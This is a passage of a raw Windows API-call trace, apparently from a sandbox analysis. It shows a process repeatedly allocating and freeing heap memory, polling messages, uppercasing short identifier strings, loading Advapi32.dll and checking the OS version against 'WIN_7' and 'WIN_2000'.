[0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.311] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.311] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.311] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.314] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.315] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0262.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.316] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0262.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.317] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.317] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.318] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.318] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.319] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.321] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.321] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0262.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.323] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.323] RtlAllocateHeap 